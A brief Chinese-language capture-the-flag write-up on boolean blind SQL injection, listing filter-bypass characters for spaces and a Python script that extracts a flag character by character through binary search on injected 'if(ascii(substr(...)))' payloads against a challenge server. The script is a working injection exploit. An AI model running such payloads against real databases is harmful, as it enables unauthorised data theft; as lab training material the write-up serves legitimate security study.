BOOL盲注 异或注入

    1,2返回结果,()可以使用,大部分函数可以使用
    空格过滤::%0a,%0b,%0c,%0d,%09,/*/,/!*/,(TAB)

    使用二分法盲治脚本

    1. import requests
    2. import time
    4. url = "http://e93a4c52-4dfd-4bb1-afc3-b9f20eea580e.node3.buuoj.cn/index.php"
    5. anser = "Hello, glzjin wants a girlfriend."
    6. flag = ""
    8. for i in range(1,50):
    9.     time.sleep(1)
    10.     high = 127
    11.     low = 32
    12.     mid = (high+low)//2
    13.     while high>low:
    14.         payload="if(ascii(substr((select flag from flag),{},1)>{},1,2)".format(i,mid)
    15.         data = {"id":payload}
    16.         response = requests.post(url=url,data=data)
    17.         if anser in response.text:
    18.             low = mid+1
    19.         else:
    20.             high = mid
    21.         mid = (high+low)//2
    22.     flag += chr(mid)
    23.     print(flag)